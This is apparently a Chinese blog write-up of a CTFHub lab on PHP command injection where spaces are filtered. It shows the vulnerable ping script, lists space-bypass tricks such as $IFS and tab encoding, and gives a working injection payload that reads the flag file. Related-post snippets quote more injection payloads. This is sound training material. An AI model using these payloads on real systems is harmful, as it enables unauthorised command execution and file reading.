ctfhub-过滤空格

最新推荐文章于 2024-08-15 08:30:00 发布
最新推荐文章于 2024-08-15 08:30:00 发布
阅读量970 收藏 2
点赞数
文章标签: p2p 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/121944962
版权

PHP 命令注入 空格过滤 漏洞利用 网络安全
关键词由CSDN通过智能技术生成 

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>CTFHub 命令注入-过滤空格</title>
</head>
<body>

<h1>CTFHub 命令注入-过滤空格</h1>

<form action="#" method="GET">
    <label for="ip">IP : </label><br>
    <input type="text" id="ip" name="ip">
    <input type="submit" value="Ping">
</form>

<hr>

<pre>
<?php
if ($res) {
    print_r($res);
}
?>
</pre>

<?php
show_source(__FILE__);
?>

</body>
<ml>

代码好像没写什么有用的信息,反正根据题意就是过滤空格

绕过对空格的过滤

常见方法有<<>%20(space)%09(tab)\$IFS\$9\${IFS}$IFS

127.0.0.1|cat<flag_11252306893651.php

查看源代码就可以看到

m0_62094846
关注
CTFTools-v1.3.7 所有古典密码与现代密码解码与编码与一身
06-14
摩斯密码(只有01(无规则)或.-,空格或/做分隔符): 云影密码(01248): 栅栏密码(分组数作密钥): 培根密码(大小写的ABab,而且必须是5个一组,不是5个就考虑摩斯密码): 与佛论禅编码,要加上佛曰:才能转换(BASE...
CTFHub XSS 过滤关键词 WriteUp
柠檬i的博客
07-05 917
绕过xss关键词过滤,双写绕过和大小写绕过是比较常见的方式
CTF 命令执行编码绕过的新思路
qq_25755011的博客
04-09 1466
前言 师弟师妹给20级开学考中的一道题,过滤非常严格,以常规拼接方法构造的话要构造非常长的payload,在研究的时候意外发现了一个新的方法,这里进行一下介绍。 题目源码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|'|\"|%|{|}|php|ca
CTFHUB-SQL注入-过滤空格
最新发布
weixin_68416970的博客
08-15 180
CTFHUB-SQL注入-过滤空格的过关教程
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习)
qq_45655564的博客
05-30 9778
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHub 技能树 综合过滤
weixin_44732566的博客
03-08 1813
CTFHub 技能书 综合过滤 打开题目,源码已经出现了 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/"...
CTFhub——命令执行
墨子辰的博客
02-04 1400
目录NO.1 无过滤注入NO.2 过滤catNO.3 过滤空格NO.4 过滤目录分隔符NO.5 过滤运算符NO.6 综合过滤练习 NO.1 无过滤注入 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> 代码中没有任何过滤 ?ip=|cat 307092239529587.p
CTFhub命令注入,过滤了cat命令,过滤空格,过滤目录分隔符,过滤运算符,综合练习
luminous_you的博客
12-09 2908
命令注入 127.0.0.1&ls 127.0.0.1&cat 109131856411048.php 过滤了cat命令之后,你还有什么方法能读到 Flag? 127.0.0.1&ls 127.0.0.1&less flag_2881947412234.php 127.0.0.1&more flag_2881947412234.php 127.0.0.1&head flag_2881947412234.php 127.0.0.1&tail flag_2
Js过滤空格的实现代码
10-27
在JavaScript中,过滤空格是一项常见的任务,尤其是在处理用户输入或者格式化文本时。通过JavaScript进行空格过滤,我们可以减少服务器的负担,因为这可以在客户端完成,而不必等待数据发送到服务器并返回处理结果。...
javascript用正则表达式过滤空格的实现代码
10-22
JavaScript中使用正则表达式过滤字符串中的空格是处理文本数据时的常见需求。正则表达式提供了一种强大的方式,可以根据特定模式来匹配和操作字符串中的内容。在本文中,我们将会探讨如何利用JavaScript中的正则...
一个js过滤空格的小函数
10-25
标题中的"一个js过滤空格的小函数"指的是在JavaScript中编写的一个简单函数,用于移除字符串中的空格。这个功能在某些场景下非常有用,比如在用户注册页面,可以防止用户输入带有空格的用户名或密码,从而减轻服务器...
js过滤空格代码
10-10
过滤空格代码
CTFHub技能树RCE命令注入
szgyunyun的博客
03-19 5226
1.命令注入 // 关键代码 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) {// 传入ip, $cmd = "ping -c 4 {$_GET['ip']}";// 运行命令,可以拼接 exec($cmd, $res);// 执行cmd,把结果输出到res } if ($res) { ...
CTF RCE漏洞
nobugnomoney的博客
09-17 4470
RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 PHP 执行系统外部命令 system() exec() passthru() PHP作为一种服务器端的脚本语言,象编写简单,或者是复杂的动态网页这样的任务,它完全能够胜任。但事情不总是如此,有时
CTFHub -技能树 命令注入-无过滤
qq_45653588的博客
07-24 2096
0X00 命令注入-无过滤 进入页面后给出的源码,题目要求输入IP地址执行ping命令 <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $cmd = "ping -c 4 {$_GET['ip']}"; exec($cmd, $res); } ?> <!DOCTYPE html> <html> <head> <title>CTF
CTFHub——XSS
2302_79119987的博客
03-28 1322
"fangfa('可控点')"> 使用 ” 闭合:与上题解题思路一致,用插入语句后用xss平台找到flag,插入语句后发现无回显(模拟黑客发送xss到服务器),查找源码,发现插入成功。将xss代码输入测试栏,发现url地址有变化,将url地址复制到url地址栏,上传成功后在xss平台查看cookie。尝试注入,查看源码发现过滤空格,url地址不对,使用/**/过滤
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2597
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHub技能树web之XSS
wzhwzh123321的博客
02-26 1703
XSS系列的题目中,由于需要使用能够接受XSS数据的平台,并且由于使用的是CTFHub的模拟机器人点击我们的虚假URL,因此使用的XSS平台不能是自己本地搭建的,如果是本地的模拟点击的机器人将无法访问我们给的这个URL地址,也就无法接收到我们想要的数据了,因此想解决本系列的题目,可以通过在线XSS平台或者自己使用服务器搭建一个XSS平台。可以看到可控的位置在53-55行中的这个位置,先闭合前面的单引号和<script>,然后再用一个<script>输入XSS代码,构造语句如下';第三题: DOM反射。
CTFHub_技能树_Web之命令注入——“过滤CAT”
Ho1aAs‘s Blog
07-24 1000
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解题过程 查看源码,把cat指令过滤了,因此要绕开使用cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $
CTFHub 过滤空格
06-12
CTFHub 是一个网络安全技术社区和平台,它可能提供各种挑战(Challenge)和资源,包括渗透测试、夺旗赛(Capture the Flag, CTF)题目等。在使用 CTFHub 时,"过滤空格"通常指的是在输入或输出数据处理过程中,去除字符串中的多余空白字符,比如空格、制表符或换行符,以便正确解析或展示给用户。这在编程中常见于数据格式化、字符串操作或者接收用户输入时。 例如,在处理用户提交的代码片段或字符串谜题答案时,服务器可能需要将所有空格去掉,以确保程序的预期行为不因为输入格式的变化而受影响。这样做的目的是为了提高代码执行的准确性和一致性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值